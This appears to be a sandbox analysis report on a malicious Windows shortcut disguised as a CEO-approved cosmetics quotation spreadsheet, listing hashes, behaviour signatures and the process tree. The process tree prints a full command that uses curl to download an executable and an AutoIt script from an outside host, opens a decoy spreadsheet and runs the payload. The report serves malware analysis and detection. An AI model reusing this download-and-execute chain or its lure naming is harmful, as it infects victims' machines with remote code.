Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
29/09/2023, 06:27
Static task
static1
Behavioral task
behavioral1
Sample
Cosmetic product_list_2023_Quatation.Approved.by.CEO.xls.lnk
Resource
win7-20230831-en
2 signatures
150 seconds
General
-
Target
Cosmetic product_list_2023_Quatation.Approved.by.CEO.xls.lnk
-
Size
2KB
-
MD5
f9c403c1c4b55521d5cb06bf5232ca0e
-
SHA1
6f2cd23f0c816475dcbdbc60039c0aa7252a98fd
-
SHA256
716d31755f09d102d83a35276c9c6422c490757eb7c62f9e39a3263ba6057267
-
SHA512
4efcf9f6bf488295c3be1fcf819e618417d86d68125e2bb5d5ac86a8bdcc46d39b0da4276fac787e1881e4d228d64dd4e4bc7dd17dda34351196a59889d28af5
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2832 wrote to memory of 2468 2832 cmd.exe 29 PID 2832 wrote to memory of 2468 2832 cmd.exe 29 PID 2832 wrote to memory of 2468 2832 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Cosmetic product_list_2023_Quatation.Approved.by.CEO.xls.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k curl -# -o "C:\Users\Admin\AppData\Local\Temp\authorizer.exe" "vntricker.abcxzy.com:2351" -o "C:\Users\Admin\AppData\Local\Temp\authorizer.au3" "vntricker.abcxzy.com:2351/msiucwjhslv" -o "C:\Users\Admin\AppData\Local\Temp\Cosmetic product_list_2023_Quatation.Approved.by.CEO.xlsx" "vntricker.abcxzy.com:2351/decucwjhslv" && "C:\Users\Admin\AppData\Local\Temp\Cosmetic product_list_2023_Quatation.Approved.by.CEO.xlsx" && "C:\Users\Admin\AppData\Local\Temp\authorizer.exe" "C:\Users\Admin\AppData\Local\Temp\authorizer.au3"2⤵PID:2468
-